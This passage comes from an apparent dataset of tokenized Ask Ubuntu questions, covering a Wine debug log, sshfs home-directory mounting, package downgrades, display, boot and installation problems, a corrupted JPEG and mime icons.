wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x5f9ff4a8 ) - > ( 0x8f6248 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x5d9a3b18 ) - > ( 0x8f6248 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x132245e0 ) - > ( 0x8f6248 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x6038fe90 ) - > ( 0x8f6248 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x152dd960 ) - > ( 0x8f6248 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x605ccb70 ) - > ( 0x8f6248 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x5ec277d8 ) - > ( 0x8f6248 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x606e8518 ) - > ( 0x8f6248 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x607edb30 ) - > ( 0x8f6248 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x607e26a8 ) - > ( 0x8f6248 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x14bc74d0 ) - > ( 0x8f6248 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x60745280 ) - > ( 0x8f6248 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x606d7fd8 ) - > ( 0x8f6248 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x607e0c60 ) - > ( 0x8f6248 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x60635898 ) - > ( 0x8f6248 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x607e1898 ) - > ( 0x8f5e28 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x5da493b0 ) - > ( 0x8f5e28 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x605ad778 ) - > ( 0x8f5e28 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x6068ad38 ) - > ( 0x8f6248 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x607ec350 ) - > ( 0x8f6248 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x14ab5890 ) - > ( 0x8f6248 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x5fbedca8 ) - > ( 0x8f6248 ) fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! fixme : ieframe : clolecommandtarget_exec unimplemented cmdid 28 fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b6c9b0 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b6cf78 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b6d540 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b6f110 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b6f6d8 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b6fca0 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b70240 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b70300 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b71148 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b710d0 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x607be970 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b72590 ) - > ( ) fixme : ieframe : clolecommandtarget_exec unimplemented cmdid 69 of cgid_explorer fixme : ieframe : propertynotifysink_onchanged unimplemented dispid 1005 fixme : ieframe : clolecommandtarget_exec unimplemented cmdid 69 of cgid_explorer fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60218fa0 ) - > ( 0x8f5df4 0x8f5964 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b6cec0 ) - > ( 0x8f5df4 0x8f5964 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b6d488 ) - > ( 0x8f5df4 0x8f5964 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b6f058 ) - > ( 0x8f5df4 0x8f5964 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b6f620 ) - > ( 0x8f5df4 0x8f5964 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b6fbe8 ) - > ( 0x8f5df4 0x8f5964 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b701b8 ) - > ( 0x8f5df4 0x8f5964 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b708b0 ) - > ( 0x8f5df4 0x8f5964 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b70fe8 ) - > ( 0x8f5df4 0x8f5964 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b71628 ) - > ( 0x8f5df4 0x8f5964 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x607be8d8 ) - > ( 0x8f5df4 0x8f5964 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b724d8 ) - > ( 0x8f5df4 0x8f5964 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b72ab8 ) - > ( 0x8f5df4 0x8f5964 0 ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x602e0a50 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60a68f70 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b735e8 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b335f8 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b416a8 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b709c8 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b42580 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b42b80 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b72130 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b43ec8 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b43e38 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b44a90 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b44a00 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60240850 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x602407c0 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b48350 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b48900 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b48f18 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b49530 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b49b48 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b4a160 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b4a778 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b4ad90 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b4b3a8 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b533b8 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b55c38 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60220dd8 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60221290 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60221880 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60222488 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x603fa9b8 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x603fafb8 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b43188 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b43c68 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b438f0 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x603fb810 ) - > ( ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60b475d0 ) - > ( ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60a68d78 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60a68fd0 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60a69858 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60240700 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b41d08 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b42188 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b42a88 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b71b68 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b43dd0 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b443d0 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b445a8 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b44f98 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b45170 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b47938 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b47e50 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b48500 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b48e20 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b49438 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b49a50 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b4a068 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b4a680 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b4ac98 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b4b2b0 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b4b8c8 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b55b40 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b55df8 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60221198 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60221788 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60221d88 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b41f10 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x603faec0 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b43090 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b43690 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60b43888 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x603782d0 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x603788c8 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x603fc388 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_getcontentlength ( 0x606ff170 ) - > ( 0x8f5830 ) fixme : mshtml : nsuri_getorigincharset ( 0x604b58b8 ) - > ( 0x8f3644 ) fixme : mshtml : nshttpchannelinternal_setdocumenturi ( 0x60479580 ) - > ( ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x60b6c9b0 ) - > ( 0x8f5158 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x60b6f110 ) - > ( 0x8f5158 ) fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x60b6d540 ) - > ( 0x8f5158 ) fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! fixme : mshtml : httpnegotiate_getrootsecurityid ( 0x60439c30 ) - > ( 0x8f6214 0x8f5d84 0 ) fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x60b6f6d8 ) - > ( 0x8f5578 ) fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x607be970 ) - > ( 0x8f5578 ) fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x60b71148 ) - > ( 0x8f5578 ) fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x60b6cf78 ) - > ( 0x8f5578 ) fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x60b6fca0 ) - > ( 0x8f5578 ) fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x60b710d0 ) - > ( 0x8f5578 ) fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x602e0a50 ) - > ( 0x8f5578 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x60b72590 ) - > ( 0x8f5578 ) fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x60b70240 ) - > ( 0x8f5578 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x60b70300 ) - > ( 0x8f5578 ) fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x60b335f8 ) - > ( 0x8f5578 ) fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x60b735e8 ) - > ( 0x8f5578 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x60b42b80 ) - > ( 0x8f5578 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x60a68f70 ) - > ( 0x8f5578 ) fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x60b416a8 ) - > ( 0x8f5158 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x60b48900 ) - > ( 0x8f5158 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x60b43ec8 ) - > ( 0x8f5158 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x60b475d0 ) - > ( 0x8f5578 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x60479580 ) - > ( 0x8f5668 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! fixme : ieframe : clolecommandtarget_exec unimplemented cmdid 28 fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x607cc608 ) - > ( 0x8f37b8 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x6083a720 ) - > ( 0x8f3bd8 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x606ac6e0 ) - > ( 0x8f3bd8 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x6051c070 ) - > ( 0x8f3bd8 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x60408e90 ) - > ( 0x8f3bd8 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x607d0e90 ) - > ( 0x8f3bd8 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x606b0640 ) - > ( 0x8f3bd8 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x60878420 ) - > ( 0x8f3bd8 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries killed does anyone know how to fix this ? are there extra wine packages that can be installed ?
292312	can not sshfs mount user home directory	i am attempting to setup a centralized home-directory server through sshfs and pam-mount . currently i am stuck at this point : when attempting to mount the remote home directory sshfs just gets stuck : d_inevitable @ laptop : ~ $ sshfs -o nonempty , debug server : . fuse library version : 2.9.0 nullpath_ok : 0 nopath : 0 utime_omit_ok : 0 it freezes at this point . this seems to be because the home directory includes ~/.ssh . so when i try sshfs -o nonempty server : .ssh .ssh the same thing happens . i suppose fuse somehow initializes the mount , but then ssh needs something from it 's config directory so it tries to read from it . fuse will just block that read resulting in a deadlock . what kind of stuff does sshfs need from ~/.ssh ? i have tried to remove all read/write permissions from ~/.ssh and then mounting on some other directory . that worked fine . the debug output only complained about writing to .ssh/known_hosts .
292314	how to downgrade packages on ubuntu ?	update manager keeps packages at the latest version , but occasionally a new package version may not work as expected or properly . how to downgrade an installed package and lock it at a specific version to prevent it from being updated ? how can i do this using gui or using a terminal ?
292316	lcd monitor 2033 out of rang in ubuntu 13.04	i have a problem in ubuntu 13.04 when i want install or login . i installed ubuntu with a crt monitor but when to login with lcd monitor , i dont have screen ( out of rang ) my monitor is samsung lcd syncmaster 2033
292317	how do i completely remove unity next ?	i followed the instructions to install unity next . they worked , and i was able to run unity next . here are the instructions i used ( quoting from the above link , with parts removed ) : $ mkdir ~/unity fetch unity next source $ sudo apt-get install bzr $ bzr branch lp : unity/phablet ~/unity/unity-next $ cd ~/unity/unity-next download & dependencies $ ./build -s this will : add ppa : phablet-team/desktop-deps , ppa : canonical-qt5-edgers/qt5-proper , ppa : ubuntu-sdk-team build and install lp : libunity/phablet , lp : unity/phablet-mods , lp : hud/phablet and lp : unity-lens-people locally install build dependencies build unitynext $ ./build run unitynext $ cd ~/unity/unity-next $ ./run however , later when i tried to build a kde application , i ran into a bunch of errors . the only thing that i think this could be is because of the unity next installation , so i would like to remove it . however , i ca n't find any instructions on how to remove it , either on the aforementioned page or using google . it appears that it installed some dependencies and a ppa , but i do n't know how to easily remove them all and undo all the changes the installation did . how do i completely remove unity next , including all its dependencies and extra ppas ?
292324	how to check motherboard chipset ?	i am trying to enable intel vt-x on my clevo w150er . the processor is an intel i7-3610qm and it supports intel vt-x . however , i 've read that my motherboard also has to support it , namely , the chipsets of the motherboard must support it . so i was wondering if anyone here knows a command that can tell me which chipsets my motherboard is using and if they support intel vt-x as well . sources : http : //stackoverflow.com/questions/16429296/how-to-enable-intel-vt-x ? noredirect=1 # comment23563737_16429296 http : //software.intel.com/en-us/blogs/2010/04/02/does-my-product-support-intel-vt
292325	how to handle windows on multiple screens ?	i 've multiple screens i.e . one computer monitor and one tv . it would be preferable if , when the tv is turned off , nothing is sent to the tv but as it happens , i can have the tv turned off and doubleclick a pdf document and then it seems to appear nowhere since it is sent to the television which is turned off . this behavior is somewhat illogical ( though i 'm happy that multiple screens work so that i can play a movie on the tv and have a desktop with another monitor with my work ) so could you tell me how i can do to resolve it ? i 'm using a dell optiplex 745 with a graphics card with double dvi out , i do n't use hdmi but a dvi to hdmi cable and i believe that the cable is good .
292333	how to install windows 8 , on a computer completely running ubuntu ?	i tried booting from the dvd to install windows 8 , but unfortunately i can only install windows 8 on an ntfs hdd . so i got gparted , but i ca n't create a new partition . i was thinking i could hook up the hdd to another computer i have . it has a e-sata plug-in so i 'm not sure if it will work . even then , would i be able to format it and install windows 8 on it ? all these are just ideas i 've had that either did n't work , or i 'm afraid to test out . what can i do to install windows 8 on a computer that is n't ntfs formatted .
292336	errno 5 input/output error in ubuntu 13.04	i 'm trying to install ubuntu 13.04 in vmware but while on the middle of copying files , a pop-up error would appear : the installer encountered an error copying files to the hard disk : [ errno 5 ] input/output error this is often due to a faulty cd/dvd disk or drive , or a faulty hard disk . it may help to clean the cd/dvd , to burn the cd/dvd at a lower speed , to clean the cd/dvd drive lens ( cleaning kits are often available from electronics suppliers ) , to check whether the hard disk is old and in need of replacement , or to move the system to a cooler environment . i have tried several times but the same thing happened . i even download again a copy still the same problem occurs . i tried previous versions , 12.10 & 12.04 . they worked fine . i have searched and read several posts like this ; none of provide solution . please help . what should i do ?
292339	installed ubuntu 13.04 on windows 7 but it loads straight into ubuntu	as you can already tell , i am a ubuntu newbie ... trying to make the big switch from windows to linux . i installed ubuntu 13.04 on a partition aside from windows . i was waiting for a prompt to ask me which os to choose from but when i started my computer , ubuntu loaded up automatically . i would like to have the option of choosing the loaders on windows ( white font , black background ) and not the ubuntu one ( white font , purple background ) . thank you .
292341	error interpreting jpeg image file ( not a jpeg ... i ca n't open it ! hex editor file extrange	i ca n't open my .jpg files . it shows : error interpreting jpeg image file ( not a jpeg file : starts with ... i had found some similar problem but without resolving . i tried various softwares but does n't work because they print that is n't a jpg file . other people get 's the same problem but ca n't resolve it i see . it seems that a virus infected the file of the digital camera in a cyber cafe . editing in a hex editor the jpg i find the first bits of a normal jpg are in the middle , but do n't know how to fix it . if anybody know the problem and how to resolve i will appreciate it . what i saw similar problems so far is that nobody has been able to solve , all i could look at is what binary commented on comparing with other photos of the same shot , but even i can not fix it . thanks ! here is one of the photographs for example
292342	in ubuntu 12.04 , /dev/.udev/db no longer exists	prior to ubuntu 12.04 the udev database was available and updated at /dev/.udev/db but in 12.04 and greater , the directory /dev/.udev/ exists but the database does n't . does anyone know where it went ?
292346	what is the purpose of /usr/share/icons/gnome/scalable/mimetypes/ ?	adding an icon section in addingmimetypes has this : now we need to associate an icon with the mime type . get an svg icon and name it `` text/extension .svg '' , or whatever your modified mime type is named ; this will be the icon to represent all instances of the mime type on your system . for our python example , this is a good choice . rename the .svg file so that the it matches `` text/x-python.svg '' ( or `` insertyourmimetype.svg '' ) so that the slashes are replaced with `` - '' and there are no capital letters . then simply run the following command , with 'text/x-python ' replaced with your mime type . sudo cp text-x-python.svg /usr/share/icons/gnome/scalable/mimetypes relogin and all files ending in the mime extension will display with that icon . in my lubuntu 13.04 system i see very few icons in this folder compared to the mime types i know are present in the system : [ 08:31 am ] /usr/share/icons/gnome/scalable/mimetypes $ ls application-certificate-symbolic.svg libreoffice4.0-oasis-drawing-template.svg libreoffice4.0-oasis-spreadsheet.svg package-x-generic-symbolic.svg application-rss+xml-symbolic.svg libreoffice4.0-oasis-formula.svg libreoffice4.0-oasis-spreadsheet-template.svg text-mkd.svg audio-x-generic-symbolic.svg libreoffice4.0-oasis-master-document.svg libreoffice4.0-oasis-text.svg 